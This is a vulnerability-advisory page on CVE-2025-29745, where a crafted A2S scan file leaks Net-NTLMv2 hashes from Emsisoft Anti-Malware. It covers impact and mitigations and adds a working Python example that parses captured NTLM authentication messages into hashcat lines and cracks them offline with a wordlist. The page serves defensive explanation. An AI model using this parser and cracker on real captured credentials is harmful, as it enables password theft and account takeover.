CVE-2025-29745: n/a
Description
A vulnerability affecting the scanning module in Emsisoft Anti-Malware prior to 2024.12 allows attackers on a remote server to obtain Net-NTLMv2 hash information via a specially created A2S (Emsisoft Custom Scan) extension file.
AI Analysis
Technical Summary
CVE-2025-29745 affects the scanning module of Emsisoft Anti-Malware in versions prior to 2024.12. The flaw lies in how the scanner handles an A2S file, Emsisoft's custom-scan definition format: a specially crafted A2S file causes the product to connect to a server the attacker controls, and the authentication attempt that follows discloses Net-NTLMv2 hash information to that server. The advisory does not say how the file triggers the connection. The pattern matches the well-known class of NTLM leaks in which a processed file references a remote (UNC or WebDAV) path, but that is an inference from the symptom, not something the advisory states. A Net-NTLMv2 "hash" is not a stored credential; it is the NTLMv2 challenge-response the Windows client computes from the account's NT hash and the server-supplied challenge. An attacker who records it can crack it offline by recomputing the response for candidate passwords until one matches, or, while the connection is still live, relay the authentication to another service that accepts NTLM. Which account is exposed depends on the security context in which the scan runs; the advisory does not specify it. Exploitation requires no prior authentication, but the victim's product must process the malicious A2S file, which could be delivered by email, through a network share, or from a compromised website. No public exploit has been reported and no CVSS score has been assigned. The CVE was reserved in March 2025 and published in August 2025. The affected-version statement ("prior to 2024.12") implies that 2024.12 is the first fixed release, although the record carries no patch link.
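The Net-NTLMv2 mechanics described above, as an added example that is not part of the original advisory or of Emsisoft's code: the block builds a minimal NTLMSSP AUTHENTICATE_MESSAGE the way a Windows client would, parses it the way an attacker's capture server would, emits the hashcat mode 5600 line, and verifies a password guess offline. The user name, domain, workstation, challenges, password and wordlist are all constructed for the example; MD4 is implemented in pure Python because hashlib's md4 is frequently unavailable on OpenSSL 3 builds. Nothing here touches A2S files or the product; it illustrates only what "Net-NTLMv2 hash information" is and why capturing it matters.

```python
"""Added example (not Emsisoft's code): what a leaked Net-NTLMv2 "hash" is.
The value is the NTLMv2 challenge-response inside an NTLMSSP AUTHENTICATE_MESSAGE.
A server the attacker controls records it, turns it into a cracker input line and
checks password guesses offline.  Every name, challenge and password is constructed."""
import hmac
import struct

M32 = 0xFFFFFFFF
UNICODE_FLAG = 0x00000001  # NTLMSSP_NEGOTIATE_UNICODE

def _rotl(x, s):
    return ((x << s) | (x >> (32 - s))) & M32

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib often lacks md4 on OpenSSL 3 builds."""
    bitlen = len(data) * 8
    data = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bitlen)
    f1 = lambda x, y, z: (x & y) | (~x & z)
    f2 = lambda x, y, z: (x & y) | (x & z) | (y & z)
    f3 = lambda x, y, z: x ^ y ^ z
    rounds = (  # (boolean function, additive constant, per-step shifts, message-word order)
        (f1, 0x00000000, (3, 7, 11, 19), lambda i: i),
        (f2, 0x5A827999, (3, 5, 9, 13), lambda i: (i % 4) * 4 + i // 4),
        (f3, 0x6ED9EBA1, (3, 9, 11, 15), lambda i: (0, 2, 1, 3)[i // 4] + 4 * (0, 2, 1, 3)[i % 4]),
    )
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for f, k, shifts, order in rounds:
            for i in range(16):
                t = (a + f(b, c, d) + x[order(i)] + k) & M32
                a, b, c, d = d, _rotl(t, shifts[i % 4]), b, c
        a, b, c, d = (a + aa) & M32, (b + bb) & M32, (c + cc) & M32, (d + dd) & M32
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))

def ntlmv2_response(password, user, domain, server_challenge, blob):
    """NTProofStr = HMAC-MD5(NTOWFv2(user, domain), ServerChallenge || blob); the blob follows it."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), "md5").digest()
    return hmac.new(key, server_challenge + blob, "md5").digest() + blob

def client_blob(timestamp, client_challenge, target_domain):
    """NTLMv2_CLIENT_CHALLENGE with one AV pair (MsvAvNbDomainName) and MsvAvEOL."""
    name = target_domain.encode("utf-16le")
    av_pairs = struct.pack("<HH", 2, len(name)) + name + struct.pack("<HH", 0, 0)
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp) + client_challenge
            + b"\x00" * 4 + av_pairs + b"\x00" * 4)

def build_authenticate(user, domain, workstation, nt_response):
    """Minimal AUTHENTICATE_MESSAGE: 88-byte header (6 fields, flags, version, MIC) + payload."""
    items = (b"\x00" * 24, nt_response, domain.encode("utf-16le"), user.encode("utf-16le"),
             workstation.encode("utf-16le"), b"")  # empty LMv2 field, no session key
    header, payload = b"NTLMSSP\x00" + struct.pack("<I", 3), b""
    for item in items:
        header += struct.pack("<HHI", len(item), len(item), 88 + len(payload))
        payload += item
    header += struct.pack("<I", UNICODE_FLAG | 0x00000200 | 0x00080000) + b"\x00" * 24
    return header + payload

def parse_authenticate(msg: bytes) -> dict:
    """What a capture server extracts; each field descriptor carries length and offset."""
    if msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLMSSP AUTHENTICATE_MESSAGE")
    flags = struct.unpack_from("<I", msg, 60)[0]
    enc = "utf-16le" if flags & UNICODE_FLAG else "latin-1"  # OEM charset simplified to latin-1

    def field(n):
        length, _maxlen, offset = struct.unpack_from("<HHI", msg, 12 + 8 * n)
        return msg[offset:offset + length]

    nt = field(1)
    if len(nt) <= 24:
        raise ValueError("24-byte response is NTLMv1/LM, not NTLMv2")
    return {"domain": field(2).decode(enc), "user": field(3).decode(enc),
            "workstation": field(4).decode(enc), "proof": nt[:16], "blob": nt[16:]}

def hashcat_5600(p, server_challenge):
    """user::domain:serverchallenge:NTProofStr:blob, the line an offline cracker consumes."""
    return f"{p['user']}::{p['domain']}:{server_challenge.hex()}:{p['proof'].hex()}:{p['blob'].hex()}"

def crack(p, server_challenge, wordlist):
    """Offline guessing: recompute NTProofStr per candidate; the victim is never contacted again."""
    for guess in wordlist:
        if ntlmv2_response(guess, p["user"], p["domain"], server_challenge, p["blob"])[:16] == p["proof"]:
            return guess
    return None

def demo():
    server_challenge = bytes.fromhex("0123456789abcdef")  # constructed CHALLENGE_MESSAGE value
    blob = client_blob(0, bytes.fromhex("aaaaaaaaaaaaaaaa"), "CORP")
    nt_resp = ntlmv2_response("Winter2025!", "jdoe", "CORP", server_challenge, blob)
    captured = parse_authenticate(build_authenticate("jdoe", "CORP", "WS01", nt_resp))
    return hashcat_5600(captured, server_challenge), crack(captured, server_challenge, ["Summer2024", "Winter2025!"])
```

Calling demo() returns the mode 5600 line and the recovered password. The point for defenders is that the captured response is only as strong as the password behind it, and that capture needs just one outbound authentication to a host the attacker controls, which is why the egress and NTLM-restriction controls in the mitigation section carry most of the weight.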
Potential Impact
For European organizations, the risk is to the confidentiality of Windows network credentials: a captured Net-NTLMv2 response can be cracked offline if the underlying password is weak, or relayed while the connection is live, and the component reaching out on the victim's behalf is the endpoint security agent itself. Emsisoft Anti-Malware has a user base in Europe, particularly among small and medium-sized enterprises and some larger organizations running layered endpoint protection. Credentials obtained this way can support lateral movement, privilege escalation, and persistent access inside corporate networks, which matters most for finance, healthcare, government, and critical-infrastructure targets, where unauthorized access can lead to data breaches, operational disruption, and GDPR non-compliance. Abuse of a trusted security product also erodes confidence in endpoint protection and adds an attack surface that is rarely in scope for hardening. Because the trigger is a file the scanner processes rather than a user-visible action, and the outbound authentication can blend into ordinary file-sharing traffic, credential harvesting by this route is hard to notice without egress controls and NTLM auditing in place.
Mitigation Recommendations
Update Emsisoft Anti-Malware to version 2024.12 or later; the affected-version range identifies 2024.12 as the first fixed release, and the record carries no separate patch link, so confirm the installed version against Emsisoft's release notes. Where updating is delayed, treat A2S (custom scan) files from untrusted sources as hostile: block or quarantine them at the mail gateway and on file shares, and do not load scan definitions received unsolicited. Because the leak depends on the victim's machine authenticating to an attacker-controlled server, egress filtering is the most effective interim control: block outbound SMB (TCP 445) and NetBIOS session traffic (TCP 139) from workstations to the Internet, and restrict outbound WebDAV where it is not needed. On the Windows side, the policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" can be set to audit first (events are written to the Microsoft-Windows-NTLM/Operational log) and then to deny, with exceptions only for known internal servers. Monitor for NTLM authentication from endpoints to external or unfamiliar hosts and for indicators of NTLM relay. Multi-factor authentication does not protect NTLM itself, so the relevant identity hardening is to reduce NTLM use in favour of Kerberos, enforce SMB signing and Extended Protection for Authentication on relay-prone services, and reset the password of any account observed authenticating to an untrusted host. Security teams should also hunt for lateral movement and credential-dumping activity, and users should be told not to open unsolicited scan files.
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Sweden
Technical Details
- Data Version: 5.1
- Assigner Short Name: mitre
- Date Reserved: 2025-03-11T00:00:00.000Z
- CVSS Version: none (no score assigned)
- State: PUBLISHED
Threat ID: 68921990ad5a09ad00e9cbae
Added to database: 8/5/2025, 2:47:44 PM
Last enriched: 8/5/2025, 3:03:16 PM
Last updated: 9/1/2025, 9:51:22 PM
Views: 30
Related Threats
- CVE-2025-55944: n/a (severity: Unknown)
- CVE-2025-55852: n/a (severity: Unknown)
- CVE-2025-56435: n/a (severity: Unknown)
- CVE-2025-0280: CWE-257 Storing Passwords in a Recoverable Format in HCL Software Compass (severity: High)
- CVE-2025-58460: Vulnerability in Jenkins Project Jenkins OpenTelemetry Plugin (severity: High)